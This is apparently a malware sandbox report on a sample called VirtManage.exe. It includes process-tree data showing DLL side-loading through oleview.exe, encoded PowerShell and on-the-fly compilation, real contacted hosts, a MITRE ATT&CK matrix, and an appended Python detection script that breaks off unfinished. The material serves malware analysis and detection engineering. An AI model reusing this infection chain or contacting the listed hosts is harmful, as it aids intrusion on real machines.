Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_656EE540 GetTimeZoneInformation,GetSystemTimeAsFileTime,1_2_656EE540
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\msiexec.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 Blob
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_0049C5F0 sqlite3_db_handle,sqlite3_bind_parameter_count,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_prepare_v2,sqlite3_bind_blob,sqlite3_bind_text,sqlite3_step,sqlite3_column_text,sqlite3_column_type,sqlite3_step,gcry_free,sqlite3_reset,sqlite3_errstr,strlen,sqlite3_malloc,memcpy,sqlite3_column_count,gcry_xmalloc,sqlite3_column_name,sqlite3_errmsg,strlen,sqlite3_malloc,memcpy,sqlite3_finalize,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,gpgrt_log_fatal,gpgrt_log_fatal,strlen,_gpg_w32_gettext,1_2_0049C5F0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_004AC8D0 _gpg_w32_bindtextdomain,_gpg_w32_textdomain,1_2_004AC8D0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_0049C5F0 sqlite3_db_handle,sqlite3_bind_parameter_count,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_prepare_v2,sqlite3_bind_blob,sqlite3_bind_text,sqlite3_step,sqlite3_column_text,sqlite3_column_type,sqlite3_step,gcry_free,sqlite3_reset,sqlite3_errstr,strlen,sqlite3_malloc,memcpy,sqlite3_column_count,gcry_xmalloc,sqlite3_column_name,sqlite3_errmsg,strlen,sqlite3_malloc,memcpy,sqlite3_finalize,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,gpgrt_log_fatal,gpgrt_log_fatal,strlen,_gpg_w32_gettext,3_2_0049C5F0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_004AC8D0 _gpg_w32_bindtextdomain,_gpg_w32_textdomain,3_2_004AC8D0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B6564 sqlite3_value_frombind,3_2_665B6564
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B6260 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,3_2_665B6260
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B82B4 sqlite3_transfer_bindings,3_2_665B82B4
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B8062 sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_665B8062
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B80CA sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_665B80CA
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B815A sqlite3_bind_parameter_count,3_2_665B815A
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B81F6 sqlite3_bind_parameter_index,3_2_665B81F6
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B8181 sqlite3_bind_parameter_name,3_2_665B8181
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B7E4A sqlite3_bind_text64,3_2_665B7E4A
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B7E0F sqlite3_bind_text,3_2_665B7E0F
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B7ED1 sqlite3_bind_text16,3_2_665B7ED1
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B7F0C sqlite3_bind_value,sqlite3_value_type,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,sqlite3_bind_blob,sqlite3_bind_null,3_2_665B7F0C
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_665B7C2F sqlite3_bind_double,sqlite3_mutex_leave,3_2_665B7C2F
MITRE ATT&CK matrix, listed by tactic column (a leading number is the report's count badge for that technique; unnumbered entries are the matrix's unmatched placeholder techniques):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; 112 Command and Scripting Interpreter; 1 Service Execution; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 Windows Service; 1 Office Application Startup; 1 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 Access Token Manipulation; 1 Windows Service; 11 Process Injection; 1 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 21 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 11 Masquerading; 131 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 11 Peripheral Device Discovery; 2 File and Directory Discovery; 126 System Information Discovery; 211 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1632487 | Sample: VirtManage.exe | Start date: 08/03/2025 | Architecture: WINDOWS | Score: 42

Signatures attached to the analysis root: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; .NET source code contains a domain name check; Sigma detected: Dot net compiler compiles file from suspicious location
Hosts resolved during the run: ec2-52-14-160-176.us-east-2.compute.amazonaws.com; cdn-app-web2.lenete5970.workers.dev

Process tree (dropped files, signatures and network contacts are listed under the process that produced them; bracketed numbers are the graph's created-registry-value and created-file counts as shown):

VirtManage.exe [2, 36]
  dropped: C:\Users\user\AppData\Local\...\nsis7z.dll (PE32); C:\Users\user\AppData\Local\...\nsExec.dll (PE32); C:\ProgramData\Microsoft\...\zlib1.dll (PE32); 9 other malicious files
  oleview.exe
    signatures: Suspicious powershell command line found; Obfuscated command line found; Encrypted powershell cmdline option found
    powershell.exe
      network: cdn-app-web2.lenete5970.workers.dev, 104.21.62.135 port 443 (local ports 49694, 49695), CLOUDFLARENET, US, United States
      dropped: C:\Users\user\AppData\...\b0okydtw.cmdline (Unicode)
      signatures: Uses whoami command line tool to query computer and username; Loading BitLocker PowerShell Module
      csc.exe
        dropped: C:\Users\user\AppData\Local\...\b0okydtw.dll (PE32)
        cvtres.exe
      conhost.exe
      whoami.exe
  7za.exe [6]
    dropped: C:\ProgramData\Microsoft\...\oleview.exe (PE32+); C:\ProgramData\Microsoft\...\aclui.dll (PE32+); C:\ProgramData\Microsoft\...\aclui-2.dll (PE32+)
    conhost.exe
  msiexec.exe [11]
    dropped: C:\Users\user\AppData\Local\...\MSI3323.tmp (PE32); C:\Users\user\AppData\Local\...\MSI32C4.tmp (PE32)
  9 other processes
    dropped: C:\ProgramData\Microsoft\...\7za.exe (PE32+); C:\ProgramData\Microsoft\...\7za.dll (PE32+)
    w32tm.exe [1]
      network: ec2-52-14-160-176.us-east-2.compute.amazonaws.com, 52.14.160.176 port 123, AMAZON-02, US, United States
    conhost.exe
    conhost.exe
    7 other processes
oleview.exe (second instance, started from the analysis root)
  signatures: Suspicious powershell command line found; Obfuscated command line found
  powershell.exe
    signatures: Loading BitLocker PowerShell Module
    conhost.exe
msiexec.exe
  msiexec.exe [1, 1]
    WmiPrvSE.exe
svchost.exe
  network: 127.0.0.1
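The chain in the graph (VirtManage.exe starts oleview.exe from under ProgramData, oleview.exe starts powershell.exe with an encoded command line, powershell.exe drives csc.exe over a .cmdline file under AppData and runs whoami.exe) is what a detection engineer would want to alert on from process-creation telemetry alone. The Python below is an added example, not part of the Joe Sandbox report and not a vendor rule set: it runs four such checks over constructed Sysmon-style process-creation events shaped after the graph. The event pids, the directory names used in place of the report's elided "..." path segments, the side-load host list and the trusted-root list are assumptions.

```python
"""Process-chain detection rules modelled on this report's behavior graph.

Added example, not part of the Joe Sandbox report. The events below are
constructed to mirror the graph (VirtManage.exe -> oleview.exe ->
powershell.exe -> csc.exe / whoami.exe); pids, the directory names that stand
in for the report's elided paths and the side-load host list are assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcEvent:
    """Minimal Sysmon Event ID 1 (process creation) shape."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # command line as logged


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


# Signed tools known to be copied next to a planted DLL and used as side-loading
# hosts (assumption: a short list; oleview.exe is the one dropped in this report).
SIDELOAD_HOSTS = {"oleview.exe"}
# Install roots a signed tool normally runs from; anything else is suspect.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# User-writable roots where the report's compiler input and dropped PEs live.
WRITABLE_ROOTS = ("\\appdata\\local\\", "\\programdata\\", "\\users\\public\\")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell encoded-command argument (base64 of UTF-16LE), else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def run_rules(events: List[ProcEvent]) -> List[Finding]:
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        image_low = e.image.lower()
        cl_low = e.cmdline.lower()

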